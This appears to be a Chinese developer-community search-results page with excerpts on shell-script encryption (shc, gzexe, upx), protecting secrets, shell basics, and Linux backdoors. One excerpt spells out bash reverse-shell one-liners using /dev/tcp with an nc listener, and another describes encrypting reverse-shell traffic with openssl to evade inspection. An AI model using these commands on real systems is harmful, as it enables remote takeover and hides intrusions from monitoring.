首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

shell 加密传输 | Linux后门系列

没有搞懂因为什么,所以暂时放弃用管道符来加密nc了 【 openssl 】 ubuntu 16.04 默认自带 openssl ,我们可以使用 openssl 来加密我们的流量,我只是了解 https...工作流程,如何打包,如何传输,但是对于内部使用的算法怎么算的不是很理解,所以今天特意买了两本书看一看,过一段时间就会到了,不过不影响 openssl 加密我们的流量 这次的加密在某一些层面违背了我之前的原则...可以看到,成功反弹shell(连接的过程时间很长,耐心等待) 打开Wireshark 来进行抓包,看看咱们的流量是不是真的加密了 ? 可以看到使用了 TLSv1.2 传输,加密效果应该是杠杠的!...配置监听和反弹shell ?...成功反弹shell,肯定是最近熬夜多了,脑子不灵光了 【 python3 】 除了 openssl 工具来进行加密连接,我还有其他的招,没错就是 python3 , 既然 python3 可以使用 -c

1.8K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    shell脚本加密 | shc

    场景 有时候我们写的shell脚本不便暴露里面的信息,或许此时我们或想到将不便暴露的信息以参数等方式传进去,还有一种方法:将shell脚本加密即可! 那么该如何将shell脚本加密呢?...使用shc~ ---- shc是什么 shc是一个脚本编译工具, 使用RC4加密算法, 它能够把shell程序转换成二进制可执行文件(支持静态链接和动态链接)。...add-apt-repository ppa:neurobin/ppa sudo apt-get update sudo apt-get install shc ---- shc简单使用 基本语法 shc -v -r -T -f shell.sh...案例,我们对一个demo.sh脚加密 ➜ data shc -v -r -T -f demo.sh shc shll=bash shc [-i]=-c shc [-x]=exec '%s' "$...[-l]= shc opts= shc: cc demo.sh.x.c -o demo.sh.x shc: strip demo.sh.x shc: chmod go-r demo.sh.x 注意:加密的过程中会生成两个文件

    2.8K31

    Shell脚本加密与解密

    我们写的shell脚本里面通常会包含帐号密码等信息或者你不想让别人看到的信息,那么把写好的shell脚本进行简单的加密显得有些必要了。...常用的shell加密方法有两种,一种是通过gzexe加密,另一种是通过shc加密。 我们先给一个简单的脚本,然后用它来进行加密解密演示,脚本abc.sh内容如下 1 2 #!...但是通过gzexe加密的shell脚本并不是很安全,细看我们如何通过abc这个乱码的执行文件还原成原来的shell脚本。 ?...但是通过gzexe加密的shell脚本并不是很安全,细看我们如何通过abc这个乱码的执行文件还原成原来的shell脚本。...shc加密shell脚本 shc是比gzexe安全的多的加密软件,不过网络说通过gdb调试也是可以显示内容的,不过我没有尝试,网上也没啥资料。

    14.5K30

    Shell脚本加密经验分享

    为啥要加密shell脚本 以我个人的需求为例,我要做一个自动远程登录的脚本,每次手动输密码太慢,而且输的多了密码也容易泄露;直接把密码写在脚本里,快确实是快,但是安全性让人无法忍受,写脚本的时候都有可能被过路的不小心看到密码...shell脚本加密常用的有三种方法:gzexe,shc,upx 第一种,gzexe 特点是不用安装,加解密极其简单,我个人的操作环境是macOS,直接就可以用,命令简单粗暴 加密 gzexe l.sh...第三种,upx upx是一个加壳工具,主要用来给可执行文件加密用的,但是网上也有文章说可以给shell脚本加密,所以我们就来试试。 upx安装不废话了,大家可以自行百度,这里直接操练。...upx加密命令 # 最快压缩 upx -1 l.sh # 最强压缩 upx -9 l.sh 出师不利,upx不能压缩太小文件,而脚本众所周知一般都不大,upx对shell脚本价值减少90%。...怀疑是脚本不算可执行文件,用gzexe把脚本搞成了可执行文件,又压缩了一遍,这回确定了,upx加密后的脚本就是没法执行,upx对shell脚本价值减小为0。

    2.5K20

    Linux——shell

    什么是shell? shell是系统的用户界面,提供了用户与内核进行交互操作的一种接口(命令解释器) 。它接收用户输入的命令并把它送入内核去执行。起着用户与系统之间进行交互的作用。 ?...shell的功能: 命令行解释 命令的多种执行顺序 通配符 命令补全、别名机制、命令历史 I/O重定向 管道 命令替换(` ` 或$( ) ) shell编程语言 shell可以执行——内部命令、外部命令...shell命令分为: 内部(内置)命令 内部命令是shell本身包含的一些命令,这些内部命令的代码是整个shell代码的一个组成部分; 内部命令的执行是shell通过执行自己的代码中的相应部分来完成的...外部(外置)命令 外部命令的代码则存放在一些二进制的可执行文件或者shell脚本中; 外部命令执行时,shell会在文件系统中指定的一些目录去搜索相应的文件,然后调入内存执行。...shell变量PATH中 ?

    10.7K30

    Linux系统中Shell脚本加密字段的处理方法和原理分析

    Linux系统中Shell脚本加密字段的处理方法和原理分析在Linux系统中,shell脚本被广泛用于自动化任务和系统管理。...引言Shell脚本加密是一个重要的安全措施,尤其是在处理包含敏感数据的自动化任务时。加密可以确保即使脚本被未授权用户访问,敏感信息也不会被轻易泄露。...本文将介绍几种常见的shell脚本加密方法,并分析它们的工作原理。明文存储的风险在shell脚本中明文存储敏感信息(如数据库密码、API密钥等)会带来安全风险。...DB_PASSWORD=${DB_PASSWORD}echo "Database password is set to $DB_PASSWORD"原理分析: 环境变量是在用户会话中设置的动态值,它们可以在shell...使用Linux内置加密功能Linux提供了一些内置的加密功能,如crypt命令。#!

    17200

    Linux系统中Shell脚本加密字段的处理方法和原理分析

    Linux系统中Shell脚本加密字段的处理方法和原理分析在Linux系统中,Shell脚本被广泛用于自动化任务和系统管理。...本文将探讨Shell脚本中加密字段的处理方法和原理,并提供一些实用的解决方案。...什么是Shell脚本中的敏感字段Shell脚本中的敏感字段通常指的是那些包含敏感信息的变量,如数据库密码、第三方服务的API密钥、SSH密钥等。...使用Linux内置加密工具Linux提供了一些内置的加密工具,如crypt和encfs,可以用来加密整个文件或目录。虽然这些工具不直接用于加密脚本中的字段,但可以用来保护包含敏感信息的配置文件。...结论在Linux系统中,保护Shell脚本中的敏感字段是非常重要的。通过使用环境变量、配置文件、密钥管理服务、GnuPG加密或Linux内置加密工具,可以有效地保护这些敏感信息。

    5300

    linux shell编程

    什么是shell  shell扮演者操作系统内核和用户的中间人的角色,用户通过键入shell command,然后shell通过解析用户输入,然后将请求转发给操作系统的内核进行处理。 1....还是hello world程序  首先使用vim编辑器(或者是linux下任意的文本编辑器)编写文件helloshell.sh(没有必要使用.sh后缀名):  #!.../bin/sh                                osch=0 echo "1. unix(sun os)" echo "2. linux(red hat)" echo ...        #         # nested if         if [ $osch -eq 2 ]         then                 echo "you pick up linux..."         else                 echo "what you donot like unix/linux"         fi fi #!

    12K30

    Linux反弹shell

    2345bash -i:打开一个bash交互界面 >:重定向 /dev/tcp:调用建立一个socket连接 127.0.0.1:可以任意更改需要反弹到的IP地址 2345:反弹到的端口 上面的是一个典型的反弹shell...的语句,但是这种不能实时地在攻击机输入,攻击机输出,只能在靶机输入东西,然后在攻击机看到 image.png 攻击机使用 nc -lvp 2200监听反弹回来地shell,然后等靶机输入东西后,攻击机才能获取到内容...,攻击机不能传输命令 1.2second bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 这种就是交互式shell了 &:标准错误输出重定向输出 0>&1:简单一点理解就是将我们在攻击机输入的命令当成靶机输入...,然后靶机返回内容时又重定向攻击机,也就是交互界面,打开了一个shell窗口,随意可以在攻击机执行命令,然后在攻击机输出结果,这么一个意思 0:标准输入 1:标准输出 2:标准错误输出 &:是为了区分标准输出和文件描述符...2>&1 和上面的效果一样 1.4fourth bash -i >& /dev/tcp/127.0.0.1/2345 0>&1 值得一提的是,">&"相当于"2>&1",标准错误输出 一个标准的反弹shell

    10.4K00

    扫码

    添加站长 进交流群

    领取专属 10元无门槛券

    手把手带您无忧上云

    扫码加入开发者社群

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭
      领券